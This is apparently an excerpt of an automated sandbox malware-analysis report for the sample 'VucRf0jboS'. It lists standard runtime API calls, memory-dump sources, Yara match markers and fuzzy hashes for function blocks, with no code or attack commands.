                                                                                                                                                                                                                                        • Part of subcall function 0414157F: std::_Lockit::_Lockit.LIBCPMT ref: 04141590
                                                                                                                                                                                                                                        • Part of subcall function 0414157F: std::_Lockit::~_Lockit.LIBCPMT ref: 041415AA
                                                                                                                                                                                                                                      • std::locale::_Getfacet.LIBCPMT ref: 04143890
                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 041438C1
                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 041438D7
                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 041438FD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1202896665-0
                                                                                                                                                                                                                                      • Opcode ID: 01699667aa2a77937d9adaa910a4886983fe4db3813f95f217182bdb03a19c45
                                                                                                                                                                                                                                      • Instruction ID: 2c603b3f15496d1ab3254d3468bd2afe652cfe085cee1cab30852aaf36138c1e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 01699667aa2a77937d9adaa910a4886983fe4db3813f95f217182bdb03a19c45
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66110A72E001199BCB05EBA4C884AEEB774EFC4324F15055AE831B72D0DB74AA00C7D0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _ValidateScopeTableHandlers.LIBCMT ref: 00427BD0
                                                                                                                                                                                                                                      • __FindPESection.LIBCMT ref: 00427BEA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FindHandlersScopeSectionTableValidate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 876702719-0
                                                                                                                                                                                                                                      • Opcode ID: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
                                                                                                                                                                                                                                      • Instruction ID: 52cd69d4b64803fa133344d4e9d29b6b42e74987d25fff38166c3f8cc652100c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 73A1D172B08225CFCB15CF69E9807AEB7B4EB44314F95466AD805EB351D739EC00CB98
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _ValidateScopeTableHandlers.LIBCMT ref: 04167E37
                                                                                                                                                                                                                                      • __FindPESection.LIBCMT ref: 04167E51
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FindHandlersScopeSectionTableValidate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 876702719-0
                                                                                                                                                                                                                                      • Opcode ID: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
                                                                                                                                                                                                                                      • Instruction ID: fee2714570353f164502f0eda4548af081f62ac88bdd1f39abdd8a1a374e5c88
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0A1C032A01615CFDB24DF68C9C0AADB7B4EB08314F1446AADC26AB390D735FC55CBA4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,04156BF7,00000001,00000001,?), ref: 04156A00
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,04156BF7,00000001,00000001,?,?,?,?), ref: 04156A86
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 04156B80
                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 04156B8D
                                                                                                                                                                                                                                        • Part of subcall function 04157CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04157CDE
                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 04156B96
                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 04156BBB
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1414292761-0
                                                                                                                                                                                                                                      • Opcode ID: e585c11a09ad45e81fd8c7ab38732ec500fb5332ab6a3e035dec317634217569
                                                                                                                                                                                                                                      • Instruction ID: 384e969b82dc137e91c086b54223d9e80a56596aefd352187857dad3201d4510
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e585c11a09ad45e81fd8c7ab38732ec500fb5332ab6a3e035dec317634217569
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2351C272710216EFEB254E60CCC1EEB77AAEB80754F554268EC29D71A0EB34FC408694
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __cftoe
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4189289331-0
                                                                                                                                                                                                                                      • Opcode ID: 3abcaf1d833c0b43dbdf51c67ed2576d6ab8f65321eebda5ff6643d6b04ddf7b
                                                                                                                                                                                                                                      • Instruction ID: df7bbd6b43df22bb4be9fc1c410e64f9820c02350ec4393f10609d324cfe3ba4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3abcaf1d833c0b43dbdf51c67ed2576d6ab8f65321eebda5ff6643d6b04ddf7b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7551FD72904205ABDF209B699D41EEF77A99F48364F10011FFA15962A2EB3DDD80C65C
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __cftoe
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4189289331-0
                                                                                                                                                                                                                                      • Opcode ID: 90da76973bb766ea4a315db8452379bb561b87577be5415ac3e43ae82e0a4dd4
                                                                                                                                                                                                                                      • Instruction ID: 0cba873cd3179a7327d498c2913af38654d29c5c88b7fed1dcd3b727d5328e05
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90da76973bb766ea4a315db8452379bb561b87577be5415ac3e43ae82e0a4dd4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9651C772D00205FBEB269F698CC4BEA77A9EF49364F504659EC34961B0EF31F94086A4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,0040C9B2,0040A25B), ref: 0040C9C9
                                                                                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040C9D7
                                                                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040C9F0
                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,0040C9B2,0040A25B), ref: 0040CA42
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                                                                                                      • Opcode ID: a89c5195120a82154cc37d67133d9963b678ac02c8548023733cd8c502b1c527
                                                                                                                                                                                                                                      • Instruction ID: ee19b3e2510f7423959140ec21889b16034e20938e88c6190324d52fb0663b51
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a89c5195120a82154cc37d67133d9963b678ac02c8548023733cd8c502b1c527
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8601F572649215AEE6395FB9BDC56572A54DB01338720033FF214B12F0EA794C16954C
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,0414CC19,0414A4C2), ref: 0414CC30
                                                                                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0414CC3E
                                                                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0414CC57
                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,0414CC19,0414A4C2), ref: 0414CCA9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                                                                                                      • Opcode ID: 152d12fcc9b38d6eb509e9b18f925b7f1960da531015352f4daf10028e3799ab
                                                                                                                                                                                                                                      • Instruction ID: 5e0e455b5fb176bda1d11e6f138fcd56b6dd44ecae33c8f44b4709361e8bc6e6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 152d12fcc9b38d6eb509e9b18f925b7f1960da531015352f4daf10028e3799ab
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC01FC3230A3115EB7292F757DC8AA72B55EB8177A721027DE528920F0FF12681155C4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3160817290-0
                                                                                                                                                                                                                                      • Opcode ID: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
                                                                                                                                                                                                                                      • Instruction ID: dffb23d06d1e15ef1aad1c845134e5c8e8eacf90562cc3591d5b7c0101a08115
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BDF0F43178871026C2227B367C0ABDB26299FC1775F22052FF91D92291EF2CDCC2815D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3160817290-0
                                                                                                                                                                                                                                      • Opcode ID: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
                                                                                                                                                                                                                                      • Instruction ID: d03929d009fc6faca3200d605df3e7ca80fa46da6ccaf9b106453ad1a7ad2140
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8FF0D631A48600E6E22132756CD8BEB26159BC1775FA50065FC3D922F0EF21AC0241D5
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,-@,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue), ref: 00417285
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042F340,FlsSetValue,00000000,00000364,?,00416DEB), ref: 00417291
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042F340,FlsSetValue,00000000), ref: 0041729F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                      • String ID: -@
                                                                                                                                                                                                                                      • API String ID: 3177248105-2564449678
                                                                                                                                                                                                                                      • Opcode ID: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
                                                                                                                                                                                                                                      • Instruction ID: 7e42d4c6809e44159ca8b586cb0097734ec1077dc4da662fe3f049ba49388dcf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B01F7367492279BC7314B699C44A977BB8AF55760B500671F909D7240DB34DC43C6E8
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                                                                                                      • std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Exception@8Throwstd::system_error::system_error
                                                                                                                                                                                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                      • API String ID: 1589814233-1866435925
                                                                                                                                                                                                                                      • Opcode ID: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
                                                                                                                                                                                                                                      • Instruction ID: e154b9f444e369befffee57ff699e9c141b04c4d0561678f3d19f5bf610271a8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AEF0226280031CB7DB10BAA18C02FEA7B988F0A754F21C03BFD40361E0E77D5A0482ED
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 04141B30
                                                                                                                                                                                                                                      • std::system_error::system_error.LIBCPMT ref: 04141B3F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Exception@8Throwstd::system_error::system_error
                                                                                                                                                                                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                      • API String ID: 1589814233-1866435925
                                                                                                                                                                                                                                      • Opcode ID: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
                                                                                                                                                                                                                                      • Instruction ID: e717a57c3bd66d4d6b3a04e637a8ef427d00f9af5ed04d9e76d8b2f55ad51479
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20F0F67160035DB7DB10AA908C88FD97BA89F89694F15C465ED4876180F7B5798483EC
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002), ref: 00413A8C
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00413A9F
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000), ref: 00413AC2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                      • Opcode ID: 9dff5006f0e47c0e7765be968ad1406b64006eb2177cec7e1fa0986365244e9b
                                                                                                                                                                                                                                      • Instruction ID: 222490b34c4e53a5feae2b87ffa662e2080e553be967456abbd25fb90b6b76cf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9dff5006f0e47c0e7765be968ad1406b64006eb2177cec7e1fa0986365244e9b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1EF08130A10218FBDB109F91DC09BAEBFB8EF54752F400069F809A2290DB344E45CA9C
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 00476586db13df40ae9b4ca52299d21b8cb0f2ee272e828588998c86b833e952
                                                                                                                                                                                                                                      • Instruction ID: b33920a143986800139fcf22d81ba1a33bebe7e0c53b62ede7835c02ac38fde1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 00476586db13df40ae9b4ca52299d21b8cb0f2ee272e828588998c86b833e952
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E712A71D062969BCB308F94C844AFFBB76EF41360F14022BE91457280D774ACE1C7AA
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
                                                                                                                                                                                                                                      • Instruction ID: 600c6440d6ee208a85676c5da57351fd5341fae891bf16b043f04aab907c46bc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A716D31A80216DFDF259F54C8C4AFEBB79EF413A1F1443A9ED2167160DBB0A941CBA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                                                                      • Opcode ID: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
                                                                                                                                                                                                                                      • Instruction ID: 119d67276799711db09ecd5bf14b9939420992e10a89990823b09dedeceb6b84
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F941E232E00700EBCB15DF79C880A9EB7B1EF89318B1545AAE515EB392D634AD41CB84
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                                                                      • Opcode ID: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
                                                                                                                                                                                                                                      • Instruction ID: f49c9fdd51e5f602671343433b01d37f812bd7c5f28b23ba4b5f69559ee8e4c7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F41D636A00200EFDB14DF78C9C0A9DB7B6EF85314B5545A9D969EB3A4D771F901CB80
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0041197C,?,00000000,?,00000001,?,?,00000001,0041197C,?), ref: 0041B34D
                                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0041B385
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0041B3D6
                                                                                                                                                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00410DD1,?), ref: 0041B3E8
                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 0041B3F1
                                                                                                                                                                                                                                        • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 313313983-0
                                                                                                                                                                                                                                      • Opcode ID: d59019c36856c0d038f4f00fa65e6381e0e9e1f4e06c47476786303ee0ade61e
                                                                                                                                                                                                                                      • Instruction ID: fe6b59a793102c77a27ef18a3bbb39662c21b96f940faf78fbed62ac6a6f166a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d59019c36856c0d038f4f00fa65e6381e0e9e1f4e06c47476786303ee0ade61e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3831BF72A0021A9BDB249F65CC41EEF7BA5EB40310F04012EFC14D7291EB39DDA1CB99
